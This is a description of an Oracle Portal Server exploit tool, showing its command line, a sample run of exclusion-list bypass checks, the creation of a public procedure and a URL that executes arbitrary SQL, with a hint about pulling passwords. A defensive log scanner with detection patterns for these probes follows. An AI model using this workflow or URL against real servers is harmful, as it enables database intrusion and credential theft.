Breakable
This tool is essentially a mini exploit engine that specifically targets
Oracle Portal Server and will successfully break into any release
of Oracle, including 10gR2 patched to CPU Jan 06. Because of certain
issues with Oracle patching, it is also worth trying this tool on servers
patched with more recent CPUs, in case certain elements of the
patch have not been applied or elements of later patches have
re-opened a previously fixed vulnerability. In essence, the tool
tries to create a procedure and then grant execute on it to PUBLIC.
Once this has succeeded, it tries to exploit security
weaknesses in a number of built-in Oracle procedures.
I became aware of this tool after attending the Blackhat Breaking into
Oracle Server class given by David Litchfield of NGS Software.
At the time of writing, this tool has not been publicly released and is only available to those people who take specific training at specialist NGS Software events, i.e. Black Hat.
Execution:
C:\>breakable.exe host url [port] [v]
Options:
host   IP address of the Oracle Portal Server
url    PATH_INFO, e.g. /pls/orasso
port   TCP port the Oracle Portal Server is serving pages from
v      verbose
Example:
C:\breakable 192.168.0.17 /pls/orasso 7777
Checking NULL.........................[PASSED][200]
Checking NOPROC.......................[PASSED][404]
Checking DIRECT HTP ACCESS............[FAILED][403]
Checking DIRECT OWA_UTIL ACCESS.......[FAILED][403]
Checking DIRECT DRILOAD ACCESS........[FAILED][404]
Checking NEWLINE EXCLUSION BYPASS.....[FAILED][403]
Checking LABEL EXCLUSION BYPASS.......[FAILED][403]
Checking BACKSLASH EXCLUSION BYPASS...[FAILED][404]
Checking QUOTE EXCLUSION BYPASS.......[FAILED][404]
Checking PARAM 1 EXCLUSION BYPASS.....[FAILED][404]
Checking PARAM 2 EXCLUSION BYPASS.....[FAILED][404]
Checking PARAM 3 EXCLUSION BYPASS.....[PASSED][200]
Checking PARAM 4 EXCLUSION BYPASS.....[PASSED][200]
LEVEL: 8
Creating the procedure...[FAILED]
Server responded with 404; expected 200.
Creating the procedure...[PASSED][200]
Granting execute to public...[PASSED][200]
Creating public synonym...[PASSED][200]
Checking...[PASSED][200]
Now goto:
http://192.168.0.17/pls/orasso/breakable_z?STMT=SELECT%20'BREAKABLE'%20FROM%20DUAL
Browsing to this link now gives you the option to supply single SQL
statements that are executed directly on the Oracle Portal Server.
Obviously the argument can be changed to also retrieve the passwords ;-)
The created procedure also allows the use of concatenation, so that
in this case the passwords can be concatenated with the associated user
account. Updates to the tool will be done in-house at NGS Software.
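From the defender's side, every probe in the session above (the direct calls to htp, owa_util and driload, the exclusion-bypass attempts, and the final STMT=SELECT request to the created procedure) passes through the PL/SQL gateway's access log. The scanner below is an added example, not code from the tool or from NGS Software; the package and procedure names come from this page, while the log format, client address, timestamps and the sample procedure names in the constructed log lines are assumptions.

```python
import re
from urllib.parse import unquote

# Packages the gateway's exclusion list should keep unreachable; the tool's "DIRECT ... ACCESS" checks probe exactly these.
RESTRICTED = {"htp", "owa_util", "driload"}

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
GATEWAY_RE = re.compile(r"^/pls/(?P<dad>[^/?]+)/(?P<proc>[^?]*)(?:\?(?P<query>.*))?$")
IDENT_RE = re.compile(r"^[A-Za-z][\w$#]*(?:\.[A-Za-z][\w$#]*)*$")
SQL_RE = re.compile(r"^\s*(?:select|insert|update|delete|create|grant|alter|drop|begin)\b", re.I)

def classify(path):
    """Return the reasons a PL/SQL gateway request looks hostile ([] = nothing seen)."""
    m = GATEWAY_RE.match(path)
    if not m:
        return []
    proc = unquote(m.group("proc"))
    reasons = []
    if RESTRICTED & {part.lower() for part in proc.split(".")}:
        reasons.append("restricted package called directly")
    if proc and not IDENT_RE.match(proc):
        # Anything but a plain schema.package.procedure name is a candidate exclusion-list bypass.
        reasons.append("procedure name is not a plain PL/SQL identifier")
    for param in unquote(m.group("query") or "").split("&"):
        if "=" in param and SQL_RE.match(param.split("=", 1)[1]):
            reasons.append("SQL statement passed as a parameter")
            break
    if proc.lower().startswith("breakable_"):
        reasons.append("procedure name matches the tool's artefact")
    return reasons

def scan(log_text):
    """Return (status, path, reasons) for each flagged request; a 200 is a confirmed hit."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (reasons := classify(m.group("path"))):
            hits.append((int(m.group("status")), m.group("path"), reasons))
    return hits

# Constructed sample access-log lines (Common Log Format); not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2006:09:00:01 +0000] "GET /pls/orasso/orasso.home HTTP/1.1" 200 4521
10.0.0.5 - - [10/Jan/2006:09:00:02 +0000] "GET /pls/orasso/htp.print HTTP/1.1" 403 0
10.0.0.5 - - [10/Jan/2006:09:00:03 +0000] "GET /pls/orasso/owa_util.cellsprint HTTP/1.1" 403 0
10.0.0.5 - - [10/Jan/2006:09:00:04 +0000] "GET /pls/orasso/ctxsys.driload.anyproc HTTP/1.1" 404 0
10.0.0.5 - - [10/Jan/2006:09:00:05 +0000] "GET /pls/orasso/some%27proc HTTP/1.1" 404 0
10.0.0.5 - - [10/Jan/2006:09:00:06 +0000] "GET /pls/orasso/breakable_z?STMT=SELECT%20'BREAKABLE'%20FROM%20DUAL HTTP/1.1" 200 87
"""
```

Blocked probes (403/404) still show the tool running; the single 200 against a flagged path is the one that warrants pulling the database audit trail for the CREATE PROCEDURE, GRANT EXECUTE TO PUBLIC and CREATE PUBLIC SYNONYM sequence the tool performs.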